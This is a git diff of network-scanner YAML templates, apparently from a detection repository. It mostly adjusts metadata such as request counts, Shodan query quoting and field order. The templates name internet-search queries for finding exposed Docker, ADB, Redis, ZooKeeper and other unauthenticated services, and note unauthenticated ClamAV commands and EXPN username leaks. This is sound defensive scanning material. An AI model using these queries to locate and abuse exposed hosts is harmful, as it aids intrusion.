   metadata:
-    max-request: 2
+    max-request: 1
+    shodan-query: product:"Dropbear sshd"
     verified: true
-    shodan-query: 'product:"Dropbear sshd"'
   tags: network,ssh,dropbear,detect
 
 tcp:
diff --git a/network/detection/esmtp-detect.yaml b/network/detection/esmtp-detect.yaml
index 2aecc3c599..1f248170ee 100644
--- a/network/detection/esmtp-detect.yaml
+++ b/network/detection/esmtp-detect.yaml
@@ -10,12 +10,11 @@ info:
     - https://nmap.org/nsedoc/scripts/smtp-open-relay.html
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
-    cvss-score: 0.0
     cwe-id: CWE-200
   metadata:
-    max-request: 2
+    max-request: 1
+    shodan-query: ESMTP
     verified: true
-    shodan-query: 'ESMTP'
   tags: network,detect,smtp,mail
 
 tcp:
diff --git a/network/detection/expn-mail-detect.yaml b/network/detection/expn-mail-detect.yaml
index 4408acfc97..ed7c818097 100644
--- a/network/detection/expn-mail-detect.yaml
+++ b/network/detection/expn-mail-detect.yaml
@@ -6,9 +6,9 @@ info:
   severity: info
   description: |
     The "EXPN" can be used by attackers to learn about valid usernames on the target system. On some SMTP servers, EXPN can be used to show the subscribers of a mailing list subscription lists are generally considered to be sensitive information.
-  tags: mail,expn,network,detect
   metadata:
-    max-request: 2
+    max-request: 1
+  tags: mail,expn,network,detect
 
 tcp:
   - inputs:
diff --git a/network/detection/finger-detect.yaml b/network/detection/finger-detect.yaml
index 80a548d404..4384319476 100644
--- a/network/detection/finger-detect.yaml
+++ b/network/detection/finger-detect.yaml
@@ -7,9 +7,9 @@ info:
   description: |
     The finger daemon runs on TCP port 79. The client will (in the case of remote hosts) open a connection to port 79.
   metadata:
-    max-request: 2
-    verified: true
+    max-request: 1
     shodan-query: port:"79" action
+    verified: true
   tags: network,finger,detect
 
 tcp:
diff --git a/network/detection/gnu-inetutils-ftpd-detect.yaml b/network/detection/gnu-inetutils-ftpd-detect.yaml
index 85460f07dc..b4f560c0ad 100644
--- a/network/detection/gnu-inetutils-ftpd-detect.yaml
+++ b/network/detection/gnu-inetutils-ftpd-detect.yaml
@@ -7,9 +7,9 @@ info:
   description: |
     The File Transfer Protocol (FTP) is a standard network protocol used to transfer computer files between a client and server on a computer network.
   metadata:
-    max-request: 2
+    max-request: 1
+    shodan-query: product:"GNU Inetutils FTPd"
     verified: true
-    shodan-query: 'product:"GNU Inetutils FTPd"'
   tags: network,ftp,smartgateway,gnu,inetutils,detect
 
 tcp:
diff --git a/network/detection/gopher-detect.yaml b/network/detection/gopher-detect.yaml
index 3d1ee9fdcb..789954f457 100644
--- a/network/detection/gopher-detect.yaml
+++ b/network/detection/gopher-detect.yaml
@@ -8,11 +8,10 @@ info:
     Gopher service was detected.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
-    cvss-score: 0.0
     cwe-id: CWE-200
-  tags: network,gopher,detect
   metadata:
-    max-request: 2
+    max-request: 1
+  tags: network,gopher,detect
 
 tcp:
   - inputs:
diff --git a/network/detection/ibm-d2b-database-server.yaml b/network/detection/ibm-d2b-database-server.yaml
index c6a68dcb83..2fb08c0ca6 100644
--- a/network/detection/ibm-d2b-database-server.yaml
+++ b/network/detection/ibm-d2b-database-server.yaml
@@ -10,12 +10,11 @@ info:
     - https://nmap.org/nsedoc/scripts/db2-das-info.html
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
-    cvss-score: 0.0
     cwe-id: CWE-200
   metadata:
-    max-request: 2
-    verified: true
+    max-request: 1
     shodan-query: product:"IBM DB2 Database Server"
+    verified: true
   tags: network,ibm,database,db,db2,detect
 
 tcp:
diff --git a/network/detection/imap-detect.yaml b/network/detection/imap-detect.yaml
index c976843061..f148865b90 100644
--- a/network/detection/imap-detect.yaml
+++ b/network/detection/imap-detect.yaml
@@ -8,12 +8,11 @@ info:
     IMAP was detected.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
-    cvss-score: 0.0
     cwe-id: CWE-200
   metadata:
-    max-request: 2
+    max-request: 1
+    shodan-query: imap
     verified: true
-    shodan-query: 'imap'
   tags: network,detect,imap,mail
 
 tcp:
diff --git a/network/detection/iplanet-imap-detect.yaml b/network/detection/iplanet-imap-detect.yaml
index 60bc7b1b86..37ddd8519e 100644
--- a/network/detection/iplanet-imap-detect.yaml
+++ b/network/detection/iplanet-imap-detect.yaml
@@ -8,11 +8,10 @@ info:
     iPlanet Messaging Server IMAP protocol was detected.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
-    cvss-score: 0.0
     cwe-id: CWE-200
   metadata:
-    max-request: 2
     fofa-query: app="iPlanet-Messaging-Server-5.2" && protocol="imap"
+    max-request: 1
   tags: network,imap,detect
 
 tcp:
diff --git a/network/detection/microsoft-ftp-service.yaml b/network/detection/microsoft-ftp-service.yaml
index b0cc34b288..577a884721 100644
--- a/network/detection/microsoft-ftp-service.yaml
+++ b/network/detection/microsoft-ftp-service.yaml
@@ -7,9 +7,9 @@ info:
   description: |
     The File Transfer Protocol (FTP) is a standard network protocol used to transfer computer files between a client and server on a computer network.
   metadata:
-    max-request: 2
+    max-request: 1
+    shodan-query: Microsoft FTP Service
     verified: true
-    shodan-query: "Microsoft FTP Service"
   tags: network,ftp,microsoft,detect
 
 tcp:
diff --git a/network/detection/mikrotik-ftp-server-detect.yaml b/network/detection/mikrotik-ftp-server-detect.yaml
index 32fdf0196f..5eddbb1f40 100644
--- a/network/detection/mikrotik-ftp-server-detect.yaml
+++ b/network/detection/mikrotik-ftp-server-detect.yaml
@@ -7,9 +7,9 @@ info:
   description: |
     The File Transfer Protocol (FTP) is a standard network protocol used to transfer computer files between a client and server on a computer network.
   metadata:
-    max-request: 2
+    max-request: 1
+    shodan-query: product:"MikroTik router ftpd"
     verified: true
-    shodan-query: 'product:"MikroTik router ftpd"'
   tags: network,ftp,mikrotik,router,detect
 
 tcp:
diff --git a/network/detection/mikrotik-routeros-api.yaml b/network/detection/mikrotik-routeros-api.yaml
index 8bc12b6619..1c07c6a24b 100644
--- a/network/detection/mikrotik-routeros-api.yaml
+++ b/network/detection/mikrotik-routeros-api.yaml
@@ -8,12 +8,11 @@ info:
     MikroTik RouterOS API was detected.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
-    cvss-score: 0.0
     cwe-id: CWE-200
   metadata:
-    max-request: 2
-    verified: true
+    max-request: 1
     shodan-query: product:"MikroTik RouterOS API Service"
+    verified: true
   tags: network,mikrotik,detect
 
 tcp:
diff --git a/network/detection/mongodb-detect.yaml b/network/detection/mongodb-detect.yaml
index 767acb5329..8b89e6e4da 100644
--- a/network/detection/mongodb-detect.yaml
+++ b/network/detection/mongodb-detect.yaml
@@ -6,15 +6,14 @@ info:
   severity: info
   description: |
     MongoDB service was detected.
-  classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
-    cvss-score: 0.0
-    cwe-id: CWE-200
   reference:
     - https://github.com/orleven/Tentacle
-  tags: network,mongodb,detect
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+    cwe-id: CWE-200
   metadata:
-    max-request: 2
+    max-request: 1
+  tags: network,mongodb,detect
 
 tcp:
   - inputs:
diff --git a/network/detection/msmq-detect.yaml b/network/detection/msmq-detect.yaml
index c5f820607d..0429cdbb09 100644
--- a/network/detection/msmq-detect.yaml
+++ b/network/detection/msmq-detect.yaml
@@ -11,10 +11,10 @@ info:
     - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-mqqb/50da7ea1-eed7-41f9-ba6a-2aa37f5f1e92
     - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-21554
   metadata:
-    max-request: 2
-    verified: true
-    shodan-query: MSMQ
     censys-query: services.service_name:MSMQ
+    max-request: 1
+    shodan-query: MSMQ
+    verified: true
   tags: network,msmq,detect
 
 tcp:
diff --git a/network/detection/mysql-detect.yaml b/network/detection/mysql-detect.yaml
index f7e5ee3c42..8319e00b54 100644
--- a/network/detection/mysql-detect.yaml
+++ b/network/detection/mysql-detect.yaml
@@ -8,12 +8,11 @@ info:
     MySQL instance was detected.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
-    cvss-score: 0.0
     cwe-id: CWE-200
   metadata:
-    max-request: 2
-    verified: true
+    max-request: 1
     shodan-query: product:"MySQL"
+    verified: true
   tags: network,mysql,db,detect
 
 tcp:
diff --git a/network/detection/openssh-detect.yaml b/network/detection/openssh-detect.yaml
index b2247e0ca9..4d71cedb67 100644
--- a/network/detection/openssh-detect.yaml
+++ b/network/detection/openssh-detect.yaml
@@ -6,19 +6,18 @@ info:
   severity: info
   description: |
     OpenSSH service was detected.
-  classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
-    cvss-score: 0.0
-    cwe-id: CWE-200
   reference:
     - http://www.openwall.com/lists/oss-security/2016/08/01/2
     - http://www.openwall.com/lists/oss-security/2018/08/15/5
     - http://seclists.org/fulldisclosure/2016/Jul/51
     - https://nvd.nist.gov/vuln/detail/CVE-2016-6210
     - https://nvd.nist.gov/vuln/detail/CVE-2018-15473
-  tags: seclists,network,ssh,openssh,detect
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+    cwe-id: CWE-200
   metadata:
-    max-request: 2
+    max-request: 1
+  tags: seclists,network,ssh,openssh,detect
 
 tcp:
   - host:
diff --git a/network/detection/pgsql-detect.yaml b/network/detection/pgsql-detect.yaml
index aa2eac58ee..91f8054806 100644
--- a/network/detection/pgsql-detect.yaml
+++ b/network/detection/pgsql-detect.yaml
@@ -11,12 +11,11 @@ info:
     - https://www.postgresql.org/docs/current/client-authentication-problems.html
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
-    cvss-score: 0.0
     cwe-id: CWE-200
   metadata:
-    max-request: 2
-    verified: true
+    max-request: 1
     shodan-query: port:5432 product:"PostgreSQL"
+    verified: true
   tags: network,postgresql,db,detect
 
 tcp:
diff --git a/network/detection/pop3-detect.yaml b/network/detection/pop3-detect.yaml
index e0188625a5..fc6a17a996 100644
--- a/network/detection/pop3-detect.yaml
+++ b/network/detection/pop3-detect.yaml
@@ -10,12 +10,11 @@ info:
     - https://nmap.org/nsedoc/scripts/pop3-ntlm-info.html
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
-    cvss-score: 0.0
     cwe-id: CWE-200
   metadata:
-    max-request: 2
+    max-request: 1
+    shodan-query: pop3 port:110
     verified: true
-    shodan-query: 'pop3 port:110'
   tags: network,detect,pop3,mail
 
 tcp:
diff --git a/network/detection/proftpd-server-detect.yaml b/network/detection/proftpd-server-detect.yaml
index f00fcb785d..d916b8d423 100644
--- a/network/detection/proftpd-server-detect.yaml
+++ b/network/detection/proftpd-server-detect.yaml
@@ -7,9 +7,9 @@ info:
   description: |
     The File Transfer Protocol (FTP) is a standard network protocol used to transfer computer files between a client and server on a computer network.
   metadata:
-    max-request: 2
+    max-request: 1
+    shodan-query: product:"ProFTPD"
     verified: true
-    shodan-query: 'product:"ProFTPD"'
   tags: network,ftp,proftpd,detect
 
 tcp:
diff --git a/network/detection/rabbitmq-detect.yaml b/network/detection/rabbitmq-detect.yaml
index d30db181a7..5b8f10167c 100644
--- a/network/detection/rabbitmq-detect.yaml
+++ b/network/detection/rabbitmq-detect.yaml
@@ -9,9 +9,9 @@ info:
   reference:
     - https://nmap.org/nsedoc/scripts/amqp-info.html
   metadata:
-    max-request: 2
-    verified: true
+    max-request: 1
     shodan-query: product:"RabbitMQ"
+    verified: true
   tags: network,rabbitmq,oss,detect
 
 tcp:
diff --git a/network/detection/rdp-detect.yaml b/network/detection/rdp-detect.yaml
index 0d76f3cf69..635ac81a3a 100644
--- a/network/detection/rdp-detect.yaml
+++ b/network/detection/rdp-detect.yaml
@@ -8,10 +8,9 @@ info:
     Windows Remote Desktop Protocol was detected.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
-    cvss-score: 0.0
     cwe-id: CWE-200
   metadata:
-    max-request: 2
+    max-request: 1
     verified: true
   tags: network,windows,rdp,detect
 
diff --git a/network/detection/redis-detect.yaml b/network/detection/redis-detect.yaml
index a10cd201cf..4a70dfdd40 100644
--- a/network/detection/redis-detect.yaml
+++ b/network/detection/redis-detect.yaml
@@ -9,7 +9,7 @@ info:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
     cwe-id: CWE-200
   metadata:
-    max-request: 4
+    max-request: 1
     shodan-query: product:"redis"
     verified: true
   tags: network,redis,detect
diff --git a/network/detection/riak-detect.yaml b/network/detection/riak-detect.yaml
index e065574dab..bc0315d527 100644
--- a/network/detection/riak-detect.yaml
+++ b/network/detection/riak-detect.yaml
@@ -6,9 +6,9 @@ info:
   severity: info
   description: Riak is a distributed NoSQL key-value data store that offers high availability, fault tolerance, operational simplicity, and scalability.
   metadata:
-    max-request: 2
-    verified: true
+    max-request: 1
     shodan-query: product:"Riak"
+    verified: true
   tags: network,oss,detect
 
 tcp:
diff --git a/network/detection/rpcbind-portmapper-detect.yaml b/network/detection/rpcbind-portmapper-detect.yaml
index c5e1a28a2a..02e9ef6520 100644
--- a/network/detection/rpcbind-portmapper-detect.yaml
+++ b/network/detection/rpcbind-portmapper-detect.yaml
@@ -8,12 +8,11 @@ info:
   reference: https://book.hacktricks.xyz/pentesting/pentesting-rpcbind
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
-    cvss-score: 0.0
     cwe-id: CWE-200
   metadata:
-    max-request: 2
-    verified: true
+    max-request: 1
     shodan-query: port:"111"
+    verified: true
   tags: network,rpcbind,portmap,detect
 
 tcp:
diff --git a/network/detection/rsyncd-service-detect.yaml b/network/detection/rsyncd-service-detect.yaml
index fb9513e98a..121d709d18 100644
--- a/network/detection/rsyncd-service-detect.yaml
+++ b/network/detection/rsyncd-service-detect.yaml
@@ -10,11 +10,10 @@ info:
     - https://linux.die.net/man/1/rsync
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
-    cvss-score: 0.0
     cwe-id: CWE-200
-  tags: network,rsyncd,detect
   metadata:
-    max-request: 2
+    max-request: 1
+  tags: network,rsyncd,detect
 
 tcp:
   - inputs:
diff --git a/network/detection/rtsp-detect.yaml b/network/detection/rtsp-detect.yaml
index 43914dcbfe..1aa38c37f7 100644
--- a/network/detection/rtsp-detect.yaml
+++ b/network/detection/rtsp-detect.yaml
@@ -10,12 +10,11 @@ info:
     https://nmap.org/nsedoc/scripts/rtsp-methods.html
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
-    cvss-score: 0.0
     cwe-id: CWE-200
   metadata:
-    max-request: 2
-    verified: true
+    max-request: 1
     shodan-query: RTSP/1.0
+    verified: true
   tags: network,rtsp,detect
 
 tcp:
diff --git a/network/detection/samba-detect.yaml b/network/detection/samba-detect.yaml
index 7af60e0236..5c2f94fa7b 100644
--- a/network/detection/samba-detect.yaml
+++ b/network/detection/samba-detect.yaml
@@ -8,12 +8,12 @@ info:
   reference:
     - https://www.samba.org/samba/what_is_samba.html
     - https://www.samba.org/samba/history/security.html
+  remediation: Always apply the latest security patch.
   classification:
     cwe-id: CWE-200
-  remediation: Always apply the latest security patch.
-  tags: network,smb,samba,detect
   metadata:
-    max-request: 2
+    max-request: 1
+  tags: network,smb,samba,detect
 
 tcp:
   - inputs:
diff --git a/network/detection/sap-router.yaml b/network/detection/sap-router.yaml
index 63aa87a552..482076acb8 100644
--- a/network/detection/sap-router.yaml
+++ b/network/detection/sap-router.yaml
@@ -4,11 +4,11 @@ info:
   name: SAPRouter Detection
   author: randomstr1ng
   severity: info
-  tags: network,sap,detect
   description: |
     SAProuter is a software application that provides a remote connection between our customer's network and SAP.
   metadata:
-    max-request: 2
+    max-request: 1
+  tags: network,sap,detect
 
 tcp:
   - inputs:
diff --git a/network/detection/smb-detect.yaml b/network/detection/smb-detect.yaml
index 3d9c2982a6..136bcb5dd2 100644
--- a/network/detection/smb-detect.yaml
+++ b/network/detection/smb-detect.yaml
@@ -4,11 +4,11 @@ info:
   name: SMB Detection
   author: pussycat0x
   severity: low
-  tags: network,windows,smb,service,detect
   description: |
     SMB (Server Message Block) is a network-layered protocol mainly used on Windows for sharing files, printers, and communication between network-attached computers. SMB related vulnerabilities can be levaraged to compromise large-scale systems.
   metadata:
-    max-request: 2
+    max-request: 1
+  tags: network,windows,smb,service,detect
 
 tcp:
   - inputs:
diff --git a/network/detection/smtp-detect.yaml b/network/detection/smtp-detect.yaml
index 5e263cb783..c1f47429d5 100644
--- a/network/detection/smtp-detect.yaml
+++ b/network/detection/smtp-detect.yaml
@@ -4,11 +4,11 @@ info:
   name: SMTP Service Detection
   author: pussycat0x
   severity: info
-  tags: network,service,smtp,detect
   description: |
     SMTP is part of the application layer of the TCP/IP protocol. Using a process called “store and forward,” SMTP moves your email on and across networks.
   metadata:
-    max-request: 2
+    max-request: 1
+  tags: network,service,smtp,detect
 
 tcp:
   - inputs:
diff --git a/network/detection/sshd-dropbear-detect.yaml b/network/detection/sshd-dropbear-detect.yaml
index d99362fa58..fbe7736c56 100644
--- a/network/detection/sshd-dropbear-detect.yaml
+++ b/network/detection/sshd-dropbear-detect.yaml
@@ -7,9 +7,9 @@ info:
   description: |
     Dropbear is a software package written by Matt Johnston that provides a Secure Shell-compatible server and client. It is designed as a replacement for standard OpenSSH for environments with low memory and processor resources, such as embedded systems
   metadata:
-    max-request: 2
+    max-request: 1
+    shodan-query: product:"Dropbear sshd"
     verified: true
-    shodan-query: 'product:"Dropbear sshd"'
   tags: network,ssh,dropbear,detect
 
 tcp:
diff --git a/network/detection/starttls-mail-detect.yaml b/network/detection/starttls-mail-detect.yaml
index 93df953557..2795600fde 100644
--- a/network/detection/starttls-mail-detect.yaml
+++ b/network/detection/starttls-mail-detect.yaml
@@ -4,11 +4,11 @@ info:
   name: STARTTLS Mail Server Detection
   author: r3dg33k
   severity: info
-  tags: mail,starttls,network,detect
   description: |
     STARTTLS is an email protocol command that tells an email server that an email client, including an email client running in a web browser, wants to turn an existing insecure connection into a secure one.
   metadata:
-    max-request: 2
+    max-request: 1
+  tags: mail,starttls,network,detect
 
 tcp:
   - inputs:
diff --git a/network/detection/teamspeak3-detect.yaml b/network/detection/teamspeak3-detect.yaml
index b09be70bd9..57cfddee64 100644
--- a/network/detection/teamspeak3-detect.yaml
+++ b/network/detection/teamspeak3-detect.yaml
@@ -1,16 +1,16 @@
 id: teamspeak3-detect
 
-info:
-  name: TeamSpeak 3 ServerQuery Detection
-  author: pussycat0x
-  severity: info
-  description: |
-    ServerQuery is a commandline based administration tool/feature of TeamSpeak 3 server.
-  metadata:
-    max-request: 2
-    shodan-query: product:"TeamSpeak 3 ServerQuery"
-    verified: true
-  tags: network,service,teamspeak3,detect
+info:
+  name: TeamSpeak 3 ServerQuery Detection
+  author: pussycat0x
+  severity: info
+  description: |
+    ServerQuery is a commandline based administration tool/feature of TeamSpeak 3 server.
+  metadata:
+    max-request: 1
+    shodan-query: product:"TeamSpeak 3 ServerQuery"
+    verified: true
+  tags: network,service,teamspeak3,detect
 tcp:
   - inputs:
       - data: "\r\n"
diff --git a/network/detection/telnet-detect.yaml b/network/detection/telnet-detect.yaml
index e68df9520c..7682c01f76 100644
--- a/network/detection/telnet-detect.yaml
+++ b/network/detection/telnet-detect.yaml
@@ -7,9 +7,9 @@ info:
   description: |
     Telnet is a network protocol used to virtually access a computer and to provide a two-way, collaborative and text-based communication channel between two machines.
   metadata:
-    max-request: 2
-    verified: true
+    max-request: 1
     shodan-query: port:23 telnet
+    verified: true
   tags: network,telnet,detect
 
 tcp:
diff --git a/network/detection/totemomail-smtp-detect.yaml b/network/detection/totemomail-smtp-detect.yaml
index f2d966de42..25c4ec402b 100644
--- a/network/detection/totemomail-smtp-detect.yaml
+++ b/network/detection/totemomail-smtp-detect.yaml
@@ -4,11 +4,11 @@ info:
   name: Totemomail SMTP Server Detection
   author: princechaddha
   severity: info
-  tags: mail,smtp,network,totemomail,detect
   description: |
     Totemomail is a comprehensive email solution designed to address all aspects of digital communication security.
   metadata:
-    max-request: 2
+    max-request: 1
+  tags: mail,smtp,network,totemomail,detect
 
 tcp:
   - inputs:
diff --git a/network/detection/vmware-authentication-daemon-detect.yaml b/network/detection/vmware-authentication-daemon-detect.yaml
index e40312fe68..09a4f326e6 100644
--- a/network/detection/vmware-authentication-daemon-detect.yaml
+++ b/network/detection/vmware-authentication-daemon-detect.yaml
@@ -7,9 +7,9 @@ info:
   description: |
     vmauthd is the VMWare authentication daemon that is included with many VMWare products, including ESX(i), and Workstation.
   metadata:
-    max-request: 2
+    max-request: 1
+    shodan-query: product:"VMware Authentication Daemon"
     verified: true
-    shodan-query: 'product:"VMware Authentication Daemon"'
   tags: network,vmware,authenticated,detect
 
 tcp:
diff --git a/network/detection/vnc-service-detect.yaml b/network/detection/vnc-service-detect.yaml
index b92a47d673..5f765590ab 100644
--- a/network/detection/vnc-service-detect.yaml
+++ b/network/detection/vnc-service-detect.yaml
@@ -7,9 +7,9 @@ info:
   description: A Virtual Network Computing (VNC) service was detected.
   classification:
     cwe-id: CWE-200
-  tags: network,vnc,service,detect
   metadata:
-    max-request: 2
+    max-request: 1
+  tags: network,vnc,service,detect
 
 tcp:
   - inputs:
diff --git a/network/detection/xlight-ftp-service-detect.yaml b/network/detection/xlight-ftp-service-detect.yaml
index ffcb30c9f4..d1d3c60b8b 100644
--- a/network/detection/xlight-ftp-service-detect.yaml
+++ b/network/detection/xlight-ftp-service-detect.yaml
@@ -7,9 +7,9 @@ info:
   description: |
     The File Transfer Protocol (FTP) is a standard network protocol used to transfer computer files between a client and server on a computer network.
   metadata:
-    max-request: 2
+    max-request: 1
+    shodan-query: product:"Xlight ftpd"
     verified: true
-    shodan-query: 'product:"Xlight ftpd"'
   tags: network,ftp,xlight,detect
 
 tcp:
diff --git a/network/enumeration/mongodb-info-enum.yaml b/network/enumeration/mongodb-info-enum.yaml
index 6f070dcde2..df5432c84b 100644
--- a/network/enumeration/mongodb-info-enum.yaml
+++ b/network/enumeration/mongodb-info-enum.yaml
@@ -10,12 +10,11 @@ info:
     - https://nmap.org/nsedoc/scripts/mongodb-info.html
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
-    cvss-score: 0.0
     cwe-id: CWE-200
   metadata:
-    max-request: 2
-    verified: true
+    max-request: 1
     shodan-query: mongodb server information
+    verified: true
   tags: network,mongodb,enum
 
 tcp:
diff --git a/network/enumeration/niagara-fox-info-enum.yaml b/network/enumeration/niagara-fox-info-enum.yaml
index 80eb85050b..1d8d3d7d36 100644
--- a/network/enumeration/niagara-fox-info-enum.yaml
+++ b/network/enumeration/niagara-fox-info-enum.yaml
@@ -6,12 +6,12 @@ info:
   severity: info
   description: |
     Niagara Fox Protocol is a building automation protocol used between the Niagara software systems by Tridium.
-  metadata:
-    max-request: 2
-    verified: true
-    shodan-query: 'product:"Niagara Fox"'
   reference:
     - https://nmap.org/nsedoc/scripts/fox-info.html
+  metadata:
+    max-request: 1
+    shodan-query: product:"Niagara Fox"
+    verified: true
   tags: network,fox,niagara,enum
 
 tcp:
diff --git a/network/enumeration/psql-user-enum.yaml b/network/enumeration/psql-user-enum.yaml
index eb224be71e..5416a20e19 100644
--- a/network/enumeration/psql-user-enum.yaml
+++ b/network/enumeration/psql-user-enum.yaml
@@ -9,7 +9,7 @@ info:
   reference:
     - https://medium.com/@netscylla/pentesters-guide-to-postgresql-hacking-59895f4f007
   metadata:
-    max-request: 2
+    max-request: 1
     shodan-query: port:5432 product:"PostgreSQL"
     verified: "true"
   tags: network,postgresql,db,unauth,enum,psql
diff --git a/network/enumeration/smtp-commands-enum.yaml b/network/enumeration/smtp-commands-enum.yaml
index 10729964ed..23ae8283cb 100644
--- a/network/enumeration/smtp-commands-enum.yaml
+++ b/network/enumeration/smtp-commands-enum.yaml
@@ -9,9 +9,9 @@ info:
   reference:
     - https://nmap.org/nsedoc/scripts/smtp-commands.html
   metadata:
-    max-request: 2
+    max-request: 1
+    shodan-query: smtp
     verified: true
-    shodan-query: 'smtp'
   tags: network,enum,smtp,mail
 
 tcp:
diff --git a/network/enumeration/smtp/smtp-user-enum.yaml b/network/enumeration/smtp/smtp-user-enum.yaml
index 6749a789c3..8755237141 100644
--- a/network/enumeration/smtp/smtp-user-enum.yaml
+++ b/network/enumeration/smtp/smtp-user-enum.yaml
@@ -9,7 +9,7 @@ info:
   reference:
     - https://nmap.org/nsedoc/scripts/smtp-enum-users.html
   metadata:
-    max-request: 2
+    max-request: 1
     shodan-query: smtp
     verified: true
   tags: network,enum,smtp,mail
diff --git a/network/exposures/cisco-smi-exposure.yaml b/network/exposures/cisco-smi-exposure.yaml
index 2ac4e72017..e2f9022426 100644
--- a/network/exposures/cisco-smi-exposure.yaml
+++ b/network/exposures/cisco-smi-exposure.yaml
@@ -15,9 +15,9 @@ info:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
     cvss-score: 5.3
     cwe-id: CWE-200
-  tags: network,cisco,smi,exposure
   metadata:
-    max-request: 2
+    max-request: 1
+  tags: network,cisco,smi,exposure
 
 tcp:
   - inputs:
diff --git a/network/exposures/exposed-adb.yaml b/network/exposures/exposed-adb.yaml
index 4a678cc68c..6c725238d4 100644
--- a/network/exposures/exposed-adb.yaml
+++ b/network/exposures/exposed-adb.yaml
@@ -9,9 +9,9 @@ info:
     - https://doublepulsar.com/root-bridge-how-thousands-of-internet-connected-android-devices-now-have-no-security-and-are-b46a68cb0f20
     - https://www.hackeracademy.org/how-to-hack-android-device-with-adb-android-debugging-bridge
     - https://www.securezoo.com/2018/06/thousands-of-android-devices-leave-debug-port-5555-exposed/
-  tags: network,adb,rce,android,exposure
   metadata:
-    max-request: 2
+    max-request: 1
+  tags: network,adb,rce,android,exposure
 
 tcp:
   - inputs:
diff --git a/network/exposures/exposed-dockerd.yaml b/network/exposures/exposed-dockerd.yaml
index 9fa8a541e3..f5ad4518d5 100644
--- a/network/exposures/exposed-dockerd.yaml
+++ b/network/exposures/exposed-dockerd.yaml
@@ -7,9 +7,9 @@ info:
   description: |
     Docker Daemon exposed on the network map can help remote attacker to gain access to the Docker containers and potentially the host system.
   metadata:
-    max-request: 2
-    verified: true
+    max-request: 1
     shodan-query: port:2375 product:"docker"
+    verified: true
   tags: network,docker,exposure
 
 tcp:
diff --git a/network/exposures/exposed-redis.yaml b/network/exposures/exposed-redis.yaml
index 5abd6d2c3d..b650a33d0d 100644
--- a/network/exposures/exposed-redis.yaml
+++ b/network/exposures/exposed-redis.yaml
@@ -12,7 +12,7 @@ info:
     cvss-score: 7.2
     cwe-id: CWE-306
   metadata:
-    max-request: 4
+    max-request: 1
   tags: network,redis,unauth,exposure
 
 tcp:
diff --git a/network/exposures/exposed-zookeeper.yaml b/network/exposures/exposed-zookeeper.yaml
index 87d6712ba7..c3a87b47aa 100644
--- a/network/exposures/exposed-zookeeper.yaml
+++ b/network/exposures/exposed-zookeeper.yaml
@@ -7,9 +7,9 @@ info:
   description: Apache ZooKeeper was able to be accessed without any required authentication.
   reference:
     - https://zookeeper.apache.org/security.html
-  tags: network,zookeeper,unauth,exposure
   metadata:
-    max-request: 2
+    max-request: 1
+  tags: network,zookeeper,unauth,exposure
 
 tcp:
   - inputs:
diff --git a/network/misconfig/apache-dubbo-unauth.yaml b/network/misconfig/apache-dubbo-unauth.yaml
index 0ed64221ab..9e0ef74302 100644
--- a/network/misconfig/apache-dubbo-unauth.yaml
+++ b/network/misconfig/apache-dubbo-unauth.yaml
@@ -10,7 +10,7 @@ info:
     - https://dubbo.apache.org/en/docs3-v2/java-sdk/advanced-features-and-usage/security/auth/
   metadata:
     fofa-query: apache dubbo
-    max-request: 2
+    max-request: 1
     verified: true
   tags: network,dubbo,apache,unauth,misconfig
 
diff --git a/network/misconfig/apache-rocketmq-broker-unauth.yaml b/network/misconfig/apache-rocketmq-broker-unauth.yaml
index eae52acaca..10c1854114 100644
--- a/network/misconfig/apache-rocketmq-broker-unauth.yaml
+++ b/network/misconfig/apache-rocketmq-broker-unauth.yaml
@@ -10,7 +10,7 @@ info:
     - https://rocketmq.apache.org/docs/bestPractice/03access
   metadata:
     fofa-query: protocol="rocketmq"
-    max-request: 2
+    max-request: 1
     shodan-query: title:"RocketMQ"
     verified: true
   tags: network,rocketmq,broker,apache,unauth,misconfig
diff --git a/network/misconfig/clamav-unauth.yaml b/network/misconfig/clamav-unauth.yaml
index 8b5ccff311..bcdd433853 100644
--- a/network/misconfig/clamav-unauth.yaml
+++ b/network/misconfig/clamav-unauth.yaml
@@ -8,13 +8,13 @@ info:
     ClamAV server 0.99.2, and possibly other previous versions, allow the execution
     of dangerous service commands without authentication. Specifically, the command 'SCAN'
     may be used to list system files and the command 'SHUTDOWN' shut downs the service.
